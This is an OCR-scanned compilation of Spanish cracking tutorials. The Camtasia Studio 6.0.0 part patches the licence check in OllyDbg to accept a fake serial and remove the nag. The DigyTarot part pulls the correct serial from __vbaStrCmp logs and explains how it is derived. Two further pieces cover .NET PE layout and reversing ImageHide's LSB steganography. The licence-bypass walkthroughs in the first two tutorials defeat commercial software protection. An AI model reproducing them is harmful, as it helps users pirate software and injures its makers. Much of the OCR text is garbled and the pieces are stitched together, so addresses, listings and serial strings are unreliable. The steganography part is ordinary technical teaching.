PARCHEANDO CAMTASIA STUDIO 6.0.0 Fecha: 20/11-2008 


Ahora vemos que compara el serial con 1D y con 19 (29 y 25), si no es ninguno de los 
dos a O la variable [EBP-C], en otro caso la pone a 1 luego mira que el serial solo 
contenga digitos de 2 al 9 o letras (menos la o y la 1) o guiones 


DS 


(1% | have a Software Key: 


Name: 


Key: 23456-70923-45679-92345-67894, 
Atrás f Finalizar ) 


Pues vamos a poner un serial que trague con estas condiciones y FO para que rompa en 
nuestra CALL NEAR EAX, la pasamos con F8 y de momento la da como buena. Si 
seguimos traceando con F8 pronto caemos en otra CALL NEAR EAX 


CALL NEAR EAX 


Que como se ve arriba lleva AX a [EBP-4] y luego termina de cargandolo en EDX y si 
no es 1 el JNZ nos tira a la basura. El CALL EAX de 6BF237 es el alma de la 
protección y el punto a estudiar para hacer un keygen, yo me conformaré con parchear. 
Si entramos con F7 en el CALL y seguimos con F8 al poco estaremos en esta zona: 


CALL NEAR DWORD PTR DS:[751C2C 


CALL 007 0EBEE 


Podemos ver que carga en AX el valor de [EBP-2] que es OAOO luego si cambiamos el 
MOV AX,[EBP-2] por 


PARCHEANDO CAMTASIA STUDIO 6.0.0 Fecha: 20/11-2008 


Tenemos solucionado el problema ahora salvamos: 
vICcuUY 
Copy to executable Selection 


Analysis All modifications 


Detach Process 
Y en la pantalla que aparece salvamos los cambios: 


Backup > 


Copy » 


Binary » 


Assemble 


Search for 


Ctri+G 


Go to offset 


Y ya tenemos parcheado el progry, ahora F9 para que guarde nuestro serial trucho en el 
registro, si ahora cerramos el olly y arrancamos el camtasia vemos que no sale la nag, 
ademas en el menu de ayuda no aparece la opcion de introducir la clave: 


Check for Upgrade 

Frequently Asked Questions 

Tell a Friend 

Cetting Started Videos 

TechSmith on the Web » 


Reset Balloon Tips 


About Camtasia Studio 


Otros productos como el Snagit tienen la misma protección aunque en el caso de 
Snagit9 es preciso parchear también el Snagit Editor, para versiones anteriores de 
camtasia era necesario parchear también algunas de las herramientas. 


IO OOOO AVION 


CRACKING 


Digy Tarot v8 1.7 


Escrito por: HOBAS 


DESCARGO LEGAL 


DOCUMENTO ESCRITO PARA FINES DE 
EDUCACION/iINVESTIiGA CIO N 


2 [RVLCN] 


[ Proyección ] 

Aprender un poco mas de la generación de seriales 

[ El a realizar ] 

Encontrar el numero de serie para registrarnos 

[ Digy Tarot] 

Para los que no tienen suficientes cargas positivas, amuletos de la suerte o datos 
cargados con significación mágica o astrológica, ya pueden estar tranquilos, ya que 


con DigyTarot podremos dar significado a cualquier número. 
[Url de Descarga ] 
http://josejoa.net/digytarot_sample/ 

[ Manos a la Obra ] 


Cuando ejecutamos el programa nos muestra una ventana que nos pide registrarnos 


LT Regístrese, gracias! 


El programa es totalmente funcional pero dejará de 
fundionar después de 21 días. 


Nombre: — [HOBAS 
Clave: [1234567890 


[_Registrar Continuar Comprar 


Usado durante O días 


Al darle en el boton Registrar nos muestra un mensaje de que hemos errado al 
ingresar los datos 


uuUu uuu ua! 


Una aclaración si ingresamos un nombre con una longitud menor a 6 caracteres nos 
muestra un mensaje que debemos ingresar por lo menos un nombre con 6 caracteres 


DigyTarot 


El nombre debe tener 6 carácteres como mínimo 


Bueno ya tenemos suficientes datos para saber por donde atacar a este programa. 


A NN 


Como siempre analizaremos el programa para saber en que lenguaje esta hecho y si 
es que esta empaquetado o no. 


RDGiPacker Detector vO.6.5 -)X) 


CADigyT arotkDigyT arot. exe | Abrir 


Visual Basic 6.0 Código Nativo Compilador 


Nada Detectado 


Posible o de 
Al Frente 
retos Ll 


Contacto : 


dd Archivo Escaneado en 2,27 Seg. 


Como esta hecho en Visual Basic, lo resolveré de dos maneras diferentes, 


[Primera Forma] 

Haremos uso del archivo common.arg, esta en las teorías de Ricardo, Teoria 
116. Ejecuto el OllyDbg y verificamos que el archivo Common.arg esta 
completamente cargado 

OllyDbg PE Dumper 43.03 by FKMA 


Handle UnhandledExceptionFilter 
OS funeti ion descriptions from * common arg” 


ription collection on Ub strings,Written by Teerayoot(Cr. JackBbugsgroup. com 
In arget nan ett arget.arg) then copy to Ollydbg folder 
In 
In 
In >) on SysAllocStrinaByteLen in OLEAUT32 module) 
In ) on VarBstrC£mp in OLEAUT32 module) 


alnot implement yet) 
3t 


Lila PPesfimahimas de nanarnsra Mia Tanta Tanner 


Realizamos los mismos pasos que Ricardo explico detallamente en la Teoria 
116. Vemos nuestro numero de serie correcto en el Log de OllyDbg 


DL e Uva 


se4ccc14| call ro —ubastrCmp y 


Arg2 = ”” 
AB4CCODOF| CALL to —ybaStrCmp 
Argl = 


Arg2 = 93/11/2008 6:24:58 p.m.” 
BB4CD652| CALL to __vbaStrCmp 
Argi = ”” 
Arg2 = ”bB3-11-2008 M6:57:28 p.m.” 
BB4CAEG4 Breakpoint at DigyTaro. ÓD4CAESS 
3/Breakpoint at DigyTaro. B04CB2A8 
CALL to __vbaStrCmp 
Argl = "1234567890" 
Arg2 = "ops12-dosB-3yops-Bs im--“MhavTs1236"” 


[Segunda Forma] 


Haremos uso de las APIS que usa el VB en este caso pondremos un BP en 
_VbaStrCmp, como se darán cuenta Compara cadenas de texto [Str = String ; Cmp = 
Compare] 


En el OllyDbg cargado con el ejecutable presionamos Ctrl +N y buscamos la API 
_VbaStrCmp, colocamos un Set Log Breakpoint on every reference 


A NA 


Man 
—vbaRedimPreserveVar 
vbaRedimPreserveVar2 


ima: 
vbaRedimVar2 
vbaRefVarAry 
vbaResunme 
vbaRsetF imstr 
vbaRsetF instrFree 
vbaSetSystemError 
vbaStopExe 


5 
E 
E 
E 
El 


S 
(ad 
| 
19) 
2 
E 
15 
Y 


vbaStrAryToAnsi 
vbaStrAry ToUn ¡code 
vbaStrBool 
TubaStrCat 


Actualiza 


Follow in Disassembler 
Follow in Dump 


C2 6308 Find references 

FF7424 08 PUSH 

FF7424 08 PUSH | Viewcall tree 

ES Sbeerrer Al 

BFBFCO mous; — Toggle breakpoint F2 

r2aza, 1 Len Conditional breakpoint ShiFt+F2 

AE ES ER Conditional log breakpoint Shift+F4 
PUSH 


Set breakpoint on every reference 
Set log breakpoint on e: ference 


aJojes 


FF7424 6C 


FF7424 BC PUSH il 
EA BUSH Remove all breakpoints 
ES astoferr | EA lípboard 
Copy to clipboar » 
8B4424 04 MOU E PY pu0, 
c2 ecos RETN — Sortby > 
PUSH 
57 PUSH Appearance » 
8B7C24 ac MOU E. 


Modify conditional log breakpoint at 0040402A 
Condition: 


Ñ 


Explanation: Expression: 
| al 


Decode value of expression as: | Assumed by expression 


Never  Oncondition Always Pass count dec.) 


Pause program: [j E Cc 0. 


Log value of expression: aj > $ 


Log function arguments: > ES 6 


If program pauses, pass following commands to plugins: 


Ejecutamos el Programa F9 ingresamos los datos y vemos en el Log nuestro numero 


11/2008 06:24:59 p.m.” 
¡StrCmp 


'93/11/2008 07:41:31 p.m.” 
ubaStrCmp 


Arg2 Bas” 
BO4CB2EF| CALL to _vbaStrCmp 
Ar: 12134567890" 
En 12/d058/3y0ps/Bs im“/NhavTsV236"” 
BB4CRAES4| CALL"to ¡StrCmp 


Arg2 
DB4CB2EF| CALL to 
Aral 


Porque dos veces, simple por que en la primera interrupción hace la comparación de 
nuestro nombre y calcula nuestro numero de serie correcto y en la segunda 
interrupción compara nuestro numero de serie correcto con el erróneo que 
ingresamos. 


Si alguien quiere ver como se realiza el calculo de nuestro numero de serie, lo que 

hace es convertir nuestro nombre ingresado a minúsculas de ahí realiza operaciones y 

los concatena con la una cadena fija que en este caso es : 
ops12/dosO/3yops/Osim//NhavTsY 


Lo unico que varia son los 3 ultimos digitos que salen de las operaciones de nuestro 
nombre ingresado 


A NN 


[Aclaracion] 
Perdonen, se que lo hice extenso pero quería mostrarles como lo hice yo. 


[ pF del autor ] 


Saludos a todo rvLCN; CracksLatinoS, Arc; y a ti por tomarte tu tiempo para leer este 
manual 


[ El autor puede ser contactado ] 
eMail: HOBASOgmail.com 


www: http: /RVLCN.com 
http: //RVLCNsecurity.com 
http://rvlcn.iespana.es 
http://beam.to/RVLCN - Lista 
http: //RVLCNsecurity.com/foro - Foro 
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.NET PE File structure 


DOS Header 


Data directories 


Net Directory : 


e located at offset [.text section Raw offset + (Com+ Header RVA) - .text section Virtual offset ] 
where [Com+ Header] is a field in Data directories header 
e  Size=72 bytes 


Net resources and embedded streams 


e Made up of an array of blocks where each block is headed by a Dword representing the resource size. 
e  Afield in Net directory called "ResourcesRVA"” gives the offset for the first managed resource 


IL instructions bytes [.net code] 


e Every method has its own bytes and the actual bytes of the method are headed by 12 byte header 


Metadata header 


e  Thisisa dynamic header, its size = 20 + value of "VersionLength" field in this header 
e  Afield in Net directory called "MetaDataRVA" gives the offset for the header 


Metadata streams header 


e  Thisisa static header which size equals 20 bytes 


Metadata tables header 


e  Thisisa static header which size equals 24 bytes 


Metadata tables Rows Count table 


e  Thisis an array of Dword values that gives the number of rows in every metadata table, For example if you 
read these value : (1,20, 32 ,... | then the first table in metadata tables has 1 row and the second has 20 
and the third has 32 and so on 


Metadata tables 


e  Atableis made of an array of rows; a rowis a structure, After the rows of a given table end, the rows of the 
next table follow 


Native import table 


Native entry point [EP] 


.rsrc section 


Kurapica 
Thursday, February 28, 2008 


racksLatinos Team 


Jugando al Escondite 


DATOS DE INTERES 


Tema: Esteganografía 

Programa: ImageHide 

Herramientas: StegSecret, Editor hexadecimal 

Objetivo: Invertir el proceso de ocultación y recuperar los datos. 
Dificultad: Según se mire :-) 


INTRODUCCION 


Hola amigos, hace mucho que no escribía ningún tuto. No es que las cosas hayan variado demasiado, 
sigo teniendo poco tiempo libre debido al trabajo, pero el poco que tengo suelo emplearlo en las cosas 
que más me gustan y esta es una de ellas. 


Este tuto pretende únicamente servir de introducción a un tema del que, aunque había oído hablar hace 
tiempo, no había profundizado hasta hace relativamente poco. Y francamente, desde que empecé a leer 
sobre él, está resultando apasionante. Si tengo otro ratillo, a lo mejor sigo con ello, o si alguien de la 
lista se anima quizá veamos más escrito sobre el asunto. 


Sólo comentar que hace unos meses me mudé a Linux y ya casi no piso Windows para nada, así que 
todo el tuto está hecho en Linux (bueno, casi). Pero que nadie se preocupe porque las herramientas 
utilizadas son pocas y, o tienen un equivalente idéntico en Windows, o bien se pueden ejecutar 
indistintamente en ambos entornos. 


AL ATAKE 
Para empezar, como siempre, un poco de teoría. 
Esteganografía 


¡Vaya palabreja! La culpa la tienen, como de costumbre, los griegos. El origen de esta palabra son los 
vocablos griegos steganos (oculto, encubierto) y graphos (escritura). De hecho, las primeras formas de 
esteganografía datan de aquella época, nada menos. 


Hay cientos (y no exagero) de formas de esteganografía, o sea, de ocultar mensajes dentro de otros. Se 
pueden ocultar mensajes dentro de imágenes, de archivos de audio, de vídeo, de documentos (PDFs, 
DOGs, ...), etc... 


Nosotros nos ocuparemos de una de las formas de ocultarlos en el interior de imágenes (porque también 
hay varias maneras de hacerlo). De hecho, nos ceñiremos a las imágenes con formato BMP de 24 bits y 
al método de ocultación mediante sustitución LSB o sustitución del bit menos significativo (Least 
Significant Bit). Esta es una de las formas más utilizadas. 


En general, el mensaje en cuestión se ocultará dentro del archivo elegido procurando no tocar la 
cabecera de éste. Como sabéis, la cabecera la utiliza el sistema operativo para reconocer el tipo de 
fichero. 


Como hemos dicho, en este tuto nos centraremos en archivos con formato BMP, que son unos de los 
archivos de imagen más utilizados para el tema que nos ocupa, porque su estructura es muy sencillita y 
al ocupar bastante más espacio que otros formatos de imagen, también disponen de más sitio para 
guardar mensajes esteganografiados. 


Veamos, pues, cómo es la estructura de un fichero BMP: 


Cabecera (14 bytes) 
Propiedades de la imagen (40 bytes) 


Paleta de color (opcional - tamaño variable) 


Datos de la imagen 


Nosotros nos centraremos en imágenes BMP de 24 bits (luego veremos lo que esto significa). 


Los 14 bytes de la cabecera están distribuidos como sigue: 


Signature 2 bytes Siempre es 'BM' 


FileSize 4 bytes Tamaño del fichero 


Reserved 4 bytes Actualmente no se usa 


DataOffset 4 bytes Posición relativa del comienzo de los datos de la imagen 


Y los 40 bytes de propiedades de la imagen contienen: 


Size 4 bytes Tamaño de esta sección (siempre es 40 bytes) 
Width 4 bytes Anchura de la imagen en pixels 
Height 4 bytes Altura de la imagen en pixels 

Planes 2 bytes Número de planos (siempre es 1) 

BitCount 2 bytes Bits por pixel (1, 4, 8, 16, 24) 

Compression 4 bytes Tipo de compresión empleado (0, 1, 2) 

ImageSize 4 bytes Tamaño de la imagen comprimida (=0 si no se comprime) 
XPixelsPerM 4 bytes Resolución horizontal: píxels por metro 

YPixelsPerM 4 bytes Resolución vertical: píxels por metro 

ColorsUsed 4 bytes Número de colores usados, si hay paleta. 

ColorsImportant 4 bytes Número de colores importantes (=0 si son todos) 


En el caso de los BMPs de 24 bits, no existe la información de la paleta de color, así que tras esos 
primeros 54 bytes vienen directamente los pixels de la imagen. 


Luego profundizaremos un poquito más en la estructura de este tipo de archivos, por el momento nos 
podemos apañar con esto. 


Bueno, pues una vez ilustrados, vamos a la carnaza... 


Andaremos trasteando con la siguiente imagen: 


Para que luego digáis que el tío HouDiNi escribe tutos aburridos e insulsos, jeje. 
Bien, no nos despistemos que ya os estoy viendo. 


Para nuestra primera prueba utilizaremos una herramienta escrita en Delphi llamada ImageHide. Su 
funcionamiento es muy simple. Esta es la pinta que tiene: 


Load Image  Savelmage Read Data Write Data Encrypt DeCrupt 


A tl uo 15 15 
Ena! veo El Al 
ImageHide Create / View Data 


Hola, amigos, soy HouDiNi y estoy aquí dentro escondido. Por desgracia, pronto me descubrirán y 
tendré que salir de vuelta al frío y gris mundo exterior. 

En cualquier caso espero que os guste este nuevo tuto, y sobre todo, que os despierte la 
curiosidad por este tema, en mi opinión, muy interesante y divertido. 

Pues nada, un saludo para toda la gente de la lista y hasta pronto, 


- HouDiNi - 


[Empty or Unknown Format YA 


(He de reconocer que he hecho una pequeña trampa porque esta herramienta corre sobre Windows, así 
que la ejecuté con ayuda de Wine, un fantástico software que permite instalar y ejecutar programas 
Windows en Linux mediante la implementación de las APIs de dicho sistema operativo. Los que trabajáis 
con Linux ya sabréis cómo hacerlo, los que estéis con Windows, tranquilos, no tenéis ese problema... 
Tenéis otros muchos, jeje). 


Pinchando en “Load Image” cargamos la imagen en la que planeemos ocultar nuestro mensaje (véase la 
muestra O) y en el espacio que hay abajo podemos escribir dicho mensaje. Ese es el que utilizaremos en 
este caso. 


Lo siguiente que haremos será pulsar en “Write Data”, con lo que el mensaje se ocultará entre los bits 
de la imagen elegida. A continuación, haremos click sobre “Save Image” y salvaremos la imagen con 
otro nombre distinto del original. 


Bien, ahora otro inciso teórico: 

Lo que básicamente hace el ImageHide es lo que se conoce como sustitución de bit menos significativo o 
LSB. Sustituyendo los LSBs de varios bytes (o varios cientos), se produce una distorsión de la imagen 
tan minúscula que el ojo humano es incapaz de distinguirla. Lo veremos más adelante pero en nuestro 
caso, cada píxel está definido por 3 bytes, donde cada uno corresponde a la.tonalidad de uno de los 
colores básicos (Azul, Verde y Rojo). Como comprenderéis, el-cambiar el bit menos significativo de 
alguno de esos bytes (o de los tres), produce un cambio de tonalidad en el píxel correspondiente 
imposible de detectar a simple vista. 

Nota: Dependiendo del formato de la imagen, los LSBs sustituidos serán unos u otros. En el caso de un 
BMP, se suelen utilizar los pixels de la propia imagen, mientras que en una imagen con formato GIF, lo 
que suele sustituirse son los LSBs de los índices que apuntan a la paleta de colores. En caso del formato 
JPG se toquetearán los coeficientes cuantificados o DCTs, etc.,. 

Sigamos con nuestro BMP. El método es muy fácil, lo que se hace es elegir una zona del archivo (ya 
veremos cuál) y a partir de ahí, se irán cogiendo los caracteres del mensaje uno por uno, pasándolos a 
binario, cogiendo bit a bit y sustituyendo el LSB del byte correspondiente de la imagen con el bit del 
carácter del mensaje. 

Veamos un ejemplo aclaratorio. 

Imaginemos que tenemos la siguiente ristra de bytes de la imagen: 

10010110 10110110 11001001 10010011 10100101 10010111 01101001 10010010 

Y que vamos a ocultar la primera letra de nuestro mensaje (la *H”. 

Si pasamos la 'H' a binario tenemos: 01001000 (en decimal es 72) 


Ahora iremos cogiendo uno por uno los bytes de la imagen y sustituiremos su LSB por el bit 
correspondiente de nuestra letra *H”. 


Nos queda: 

10010110 10110111 11001000 10010010 10100101 10010110 01101000 10010010 
Evidentemente, algunos cambiarán (los que no coincidan) y otros no lo harán (los que coincidan). 
Se entiende, ¿verdad? Pues seguimos. 


Nuestra imagen original se llamaba Rubia.bmp y la que hemos salvado con el mensaje oculto, 
Rubia_IH.bmp 


Por cierto, no lo he comentado, pero una de las características de esta técnica, como se comprende 
fácilmente, es que no varía el tamaño de la imagen original. 


Para que veáis que no os engañaba al decir que los cambios producidos por modificaciones de LSBs eran 
inapreciables a simple vista, aquí tenéis la imagen original (izquierda) y la que tiene el mensaje oculto 
(derecha): 


¿Alguien aprecia algún cambio significativo? 
He dicho que si alguien aprecia algún.... ¿Hola? ¿Hay alguien ahí? 
Está bien, cuando os volváis a centrar, seguimos, jeje. 


Bueno, a continuación vamos a echar mano de una fantástica herramienta llamada StegSecret, que está 
programada en Java de modo que no habrá problema para ejecutarla, ya sea en Windows o en Linux. 


Os la podéis bajar de aquí: http://stegsecret.sourceforge.net/ 


En Windows simplemente tenéis que hacer doble click sobre el archivo xsetsecret.jar (teneis que tener 
instalado el Java Runtime Environment) y en Linux podéis pinchar sobre ese mismo archivo con el botón 
derecho del roedor y seleccionar la opción: 


A pesar de ser una herramienta aun en desarrollo, como aclara su autor, ya dispone de un montón de 
opciones para hacer otras tantas cosas. Nosotros, como sé que algunos sois parientes lejanos de Santo 
Tomás, vamos a usar la opción “Si no lo veo, no lo creo”. Así que hacemos click sobre: 


Con lo que nos aparece el siguiente área de trabajo donde podemos cargar hasta dos imágenes, lo que 
nos viene de muerte, puesto que lo que queremos es comparar la original y la esteganografiada: 


uba 


ros EditorLSB Editor Hexadecimal Ayuda 


Haciendo click con el botón derecho en cada panel y seleccionando: 


StegoAnálisis 

Escenarios Activos » 
Memorizar/Restaurar imagen... 
Propiedades imagen 


Cargamos ambas imágenes. No os las muestro otra vez porque para lo siguiente necesito que estéis 
medianamente concentrados :-) 


Bien, una vez que tenemos las imágenes cargadas, hacemos click otra vez con el botón derecho sobre 
cada una y seleccionamos: 


Ma 


Escenarios Activos . : 


Memorizar/Restaurar imagen... | Todos (comparativa) | Chi-Square RGB Channel Attack » 
Propiedades imagen - RS-Attack 


Pair-Values 


Con lo que podremos ver lo siguiente, que no tiene ni punto de comparación con lo anterior, jeje: 


Filtros Editor LSB Editor Hexadecimal Ayuda 


Filtros Editor LSB Editor Hexadecimal Ayuda 


Ahí lo tenemos, jeje. 

En realidad, lo que hace esta herramienta es resaltar (en colores chillones) precisamente sólo los LSBs 
de la imagen, de esa manera (a veces) podemos detectar a simple vista cierto patrón, como en este 
caso. 

Como os supondréis, esta técnica de análisis visual funciona mejor cuantas menos tonalidades de color 
tenga la imagen en cuestión. En este caso se aprecia bastante bien porque tenemos suerte y el cielo 
tiene un color más o menos uniforme. 


Quizá alguno de vosotros esté pensando que ImageHide ha ocultado el mensaje al principio del fichero. 
Pues no. Resulta que otra de las cosas que conviene saber sobre los BMPs es que los pixels de la imagen 
se guardan de atrás hacia delante, o sea, que si editamos el archivo, como vamos a hacer ahora mismo, 
esos pixels que aparecen ahí arriba a la izquierda, realmente están guardados al final del todo (de 
hecho, si alguna vez os habéis fijado en cómo pinta el ordenador los BMPs cuando abrimos uno, lo hace 
de abajo a arriba). 


Bueno, pues abrimos el fichero Rubia.bmp con nuestro editor hexadecimal favorito (yo he utilizado 
Bless, un editor hexadecimal para Linux parecidísimo al UltraEdit). 


Como comentamos anteriormente, los primeros 54 bytes contienen los metadatos de nuestra imagen: 


Rubia.bmp El 


00000000|42 4D 3E 1E 05 00 00 00 00 00 36 00 00 00 28 00 00 00 12 01 00|BM>....... a OE 
00000015/00 97 01 00 00 01 00 18 00 00 00 00 00 08 1E 05 00 00 00 00 DO|.....ccococoocooooo..... 
0000002a|00 00 00 00 00 00 00 00 00 00 00 00 4c 74 79 50 78 7D 4D 74 TC|...ooooooo... LtyPx)Mt | 
0000003f|4E 76 82 5E 87 90 4E 76 7B 43 6F 70 3B 68 65 2D 5E 56 34 68 5E|Nv.”..Nv(Cop;he-"v4h” 
00000054|34 69 5F 2D 58 55 2E 5D 5A 2F 62 5E 2B 61 5€C 29 5F 58 33 67 60/|4i_-XU.]Z/b"+al1)_X3g' 


Ahí los vemos, e inmediatamente después comienza la imagen (ya sabéis, al revés, esos primeros pixels 
corresponden al principio de la última línea de la imagen). 


Una de las cosas que tenemos en esos 54 bytes (concretamente en los bytes 19 a 26), como vimos en 
el inciso teórico, es el ancho y alto en pixels: 


Bytes 19 a 22 (Ancho) -> 00000112 = 274 pixels 
Bytes 23 a 26 (Alto) -> 00000197 = 407 pixels 


Luego nuestra Rubia contiene 274x407 = 111.518 pixels 

Pero en un BMP como este, de 24 bits, sabemos que cada pixel necesita precisamente 24 bits = 3 bytes 
para ser definido (1 byte por cada color básico: Rojo, Verde y Azul). De modo que cada uno de los tres 
colores básicos podrá tener 256 valores (o tonalidades) diferentes, con lo que cada pixel dispone de 
256*=16.777.216 tonalidades distintas (los famosos 16 millones de colores, en realidad algo más). 

Con lo cual, para pintar a nuestra Rubita, y que no se nos quede nada, necesitamos: 


111.518 x 3 = 334.554 bytes = 51ADAh bytes 


La imagen empieza en el byte 37h y mide 51ADAh bytes, luego el final lo debería tener en: 
51ADAh+36h-1h=51B0Fh 
Y digo “debería” porque si nos vamos al final del archivo, vemos que termina en 51E3D: 


00051e1f|B7 A5 BB B7 A5 BB B7 A5 BB B7 A5 BB B7 A5 BB B7 A5 BB B7 A5 BB 
00051e34|B7 A5 BB B7 A5 BB B7 A5 00 00 


Y esto, ¿por qué? 


Pues por otra característica de los BMPs de 24 bits (anda que no estamos aprendiendo cosas...) es que si 
el número de pixels de la línea no es múltiplo de 3, se rellena con (Ancho mod 4) bytes a cero. De 
hecho podéis ver que después de cada 274x3=822 bytes, vienen otros dos a 00 ([274 mod 4] = 2). 


De modo que a 51BOFh le tenemos que sumar 2x407=814 bytes (32Eh bytes). 
Y nos queda: 51B0Fh+32Eh=51E3Dh 
Bueno, vamos de una puñetera vez a ver dónde está nuestro mensaje esteganografiado. 


Como vimos en el análisis visual, lo ponía a partir del principio de la última línea (primera en la imagen), 
aunque daba la sensación, así a simple vista, de que lo repartía en varias líneas ocupando un poco de 
cada una. Vamos a verlo. 


Abrimos en nuestro editor favorito también la imagen Rubia_IH.bmp (ya teníamos abierta Rubia.bmp, si 
no, la abrimos). 


Ahora nos dirigimos al principio de la primera línea de la imagen (la última en el archivo), que empezará 
en 51E3Dh-338h+1h=51B06h (para el que se haya perdido, 338h = 822dec+2dec, o sea, el número de 
bytes de una línea de la imagen): 


Rubia.bmp 
00051b01|B8 B6 44 00 00 
00051b16 
00051b2b 
00051b40 


Rubia_IH.bmp y 
00051b01|B8 B6 a4 00 00 


00051b40 


Vemos que efectivamente, ahí empiezan las diferencias. Pero no ocupan toda la línea, parece que 
terminan 274 bytes más allá (en 0051C18h). ¿Os suena de algo ese número (274)? Pues sí, es el ancho 
en pixels. Lo he probado con el mismo mensaje y otras imágenes más anchas y más estrechas que esta 


y parece que, a falta de otra idea mejor, los autores de ImageHide decidieron partir el mensaje a 
ocultar en trocitos de n bytes, siendo n el número de pixels que mide la imagen de ancho. 


Veamos si esto es el principio de nuestro mensaje. 


Cojamos unos cuantos LSBs, a ver si lo que sale nos suena de algo. Primero pasamos a binario los 
códigos hexadecimales que vemos ahí para que nos resulte fácil saber cuál es el LSB (marcado en azul): 


A6 --> 10100110 B6--> 10110110 AA --> 10101010 
A7 --> 10100111 B7--> 10110111 BA --> 10111010 
A8 --> 10101000 B8--> 10111000 BB --> 10111011 
A9 --> 10101001 B9--> 10111001 


Este editor hexadecimal (Bless) tiene la posibilidad de verlo aquí mismo; sin más que situarte sobre los 
bytes del código. Va mostrando abajo de 4 en 4 bytes en hexadecimal, decimal, octal, binario y ASCII: 


Hexadecimal: ES A9 B9 B9 | 


Decimal: [185 169 185 185 
Octal: [271 251 271 271 ] 


Binary: [10111001 10101001 10111001 10111001 | 


ASCII Text: [2777 | 


Si no, siempre podéis usar la calculadora de Windows (o Linux) en modo científico. 


Bueno, pues escribiendo unos cuantos LSBs y agrupándolos de 8 en 8 tenemos: 


00000001 00000001 10001101 01001000 oO1101111 01101100 01100001 

'H' 'o' Y ta” 
Los tres primeros son caracteres nulos (él sabrá por qué los mete) pero luego vemos que comienza 
nuestro mensaje oculto. 


Para terminar vamos a irnos hacia atrás (o hacia delante, según se mire) a ver si en la siguiente línea 
tenemos escondidos otros 274 bytes con otros tantos LSBs del mensaje. 


La siguiente línea empieza en 51496h (podéis simplemente echar hacia atrás en el editor y buscar los 
dos bytes 00 00 que señalan el final de la línea anterior, o bien calcularlo como antes) y efectivamente: 


| B9 B7 A5 B9 B7 A5 B9 B7 A5 B9 B7 A5 B9 B7 A5 B9 B7 AS 00 00 
00051490 
1000514b6 


p0s1ase| 


Rubia_IH.bmp 


00051482|B9 B7 A5 B9 B7 A5 B9 B7 A5 B9 B7 A5 B9 B7 A5 B9 B7 A5 00 00 5653 m8 27 m9 as 


0005149c 
Y si echamos hacia abajo, vemos que las diferencias se terminan de nuevo 274 bytes más allá. 


000514b6 


Luego lo que hace nuestro amigo ImageHide es trocear el mensaje en cachitos e irlos metiendo (por el 
método de sustitución LSB) en los principios de tantas líneas como necesite empezando a contar por la 
primera de la imagen (última del archivo). 


De modo que si alguien se siente con ganas, puede escribir un pequeño programita en ensamblador que 
deshaga lo que hace el ImageHide. Con lo que hemos visto hasta aquí, tiene todos los datos necesarios. 


Para terminar vamos a ver qué pasa si el esteganografiador del mensaje decide encriptarlo. En este caso 
la cosa está más fea. 


Si volvemos al ImageHide, vemos que existe la posibilidad de encriptar el mensaje que pretendemos 
ocultar en la imagen. 


Basta con hacer click sobre el iconillo: 


Encrypt 


mo 
pp 


En cuyo caso nos solicita una contraseña: 


Enter Password 


frubid 


Ponemos esa, damos a <OK> y vemos: 


ImageHide Encrypt / Data 


—Encrypted Text 


Ry +vuMM eV NJswRHwHgLoFmbLOWorNRYgqMU al *cKv0O9NU9yRyvN7UEMióMObuDO ocPNaqryQ29DOn 
alPdoy*bE4wyn¿1+28n26puRFF«3vZnH23tMn6E yó6CHr5LakfkE o0cwCyT egcxUDSVM5wpá JD emllLbana MH 
WwyoG4yw4yLnob9+pajCyu3O3MBDHUHoOG y 4é9qeóT eky9MgwYlzv+wéyS5eHJwW190E yrh8KGC3393E pp 

9vD+22609104%11 pJaxvsWWILLerdiyr329CWPYw8EH83m43634+eebylonwqwPDABSLhbl43pekOKYF2L6 
nO IA wFISFOfeCómtBuDRN7EaRnvalFPoUeTtZuMdUxm+qp/ZCCZE ykybPw2qPa21Zxi4k7I15E16wXI125 
ATIkuPhfsD awvwNONYaHrYH 2491 ¿pn0HQjdh4r2+4KnYa*oEGuzó8isFBhNS+0b/<tW4TX2P<Csgikbu+PsK9] 
mHcwLRss2W'ekydyae/DaGKIG4B¿G324L7SDCpFA== 


Y si volvemos a pulsar en “Write Data” y a continuación en “Save Image” y le ponemos el nombre 
“Rubia2_IH.bmp”, tenemos otra imagen con un texto oculto, pero esta vez encriptado. 


Lo bueno es que si miramos un poquito más a la derecha tenemos también el icono para desencriptar: 


DeCrppt 
¿JN 
(3 


El método es el inverso, nos pide la password con la que encriptamos y nos devuelve el mensaje 
original. 


Y si hacemos una pequeña trampa y volvemos a Windows para ejecutar nuestro querido Olly, podemos 
encontrar el código encargado de desencriptar sin mucho problema (no utilicé el EDB del que está 
hablando últimamente Ricardo, por cuestiones de fiaca y de inexperiencia, pero todo llegará). 

Cargamos el ImageHide en Olly y buscamos, por ejemplo, el string “password”. 

Vamos a parar aquí: 


DB4CSF?O 
AB4CSF?S 


ES 73E6F3FF 
304D F4 


BB4CSFTDI + MOV EAX, ImageHid. 004C6BrC ASCII "Passllord” 


Sin embargo este resulta ser el código de encriptación. 


Si buscamos otra vez, vamos a parar al que desencripta, que es el que nos interesa: 


PUSH_EBP 
MOU EBP, ESP 
ADD ESP, -18 


PUSH_EDI 
S0R EDX, EDX 
MOU DWORD PTR SS: CEBP-18], EDXx 
MOU DWORD PTR SS: LEBP-C], EDX 
3955 FO MOV DWORD PTR SS: CEBP-10], EDXx 
. 8945 FC MOV DWORD_PTR SS: LEBP-4], EAX 
. 3300 S0R EAX, ERX 
+. $55 PUSH EBP 
63 B1614C00 PUSH ImageHid.004C61B1 
64:FF30 PUSH_DWORD_PTR_ FS: CEAX] 
64:8920 MOV DWORD _PTR FS: CEAXJI, ESP 
3D45 F4 LEA EAX, DWORD PTR SS: [EBP-C] 
ES BFESFSFF 


-__8D4D_F4 LEA ECx, DWORD PTR SS: [EBP-C] 


AB4CEBE1| . BS E0614C00 MOU EAX, ImageHid.B64C61E6 ASCII ”"Passilord” 
EEE | ES ESESFGrr CALL ImágeHid. 00434904 


ARIRAAFR TFST Al. Al 


DO 


DODE 


DOS 


Un poco más arriba hay algo que se parece sospechosamente al principio de una rutina, así que 
ponemos un breakpoint en el CALL de 004C60E6 y sin más le damos a F9 (<Run>). 


Arranca el ImageHide, metemos un texto, en este caso sólo “HouDiNi” y le damos para que lo encripte 
(ojo, que para que nos deje, tenemos antes que cargar una imagen). 


A continuación pulsamos en el icono “DeCrypt” y Olly detiene la ejecución en nuestro breakpoint. Damos 
F8, volvemos a ImageHide y ponemos la password para desencriptar (la misma con la que encriptamos, 
claro): 


Close 


| 
14] B 
ImageHide Encrypt / Data 


Encrypted Text 
RYXnmbZi3w== 


Encrypt 


Sta 


PASSWORD (=] 
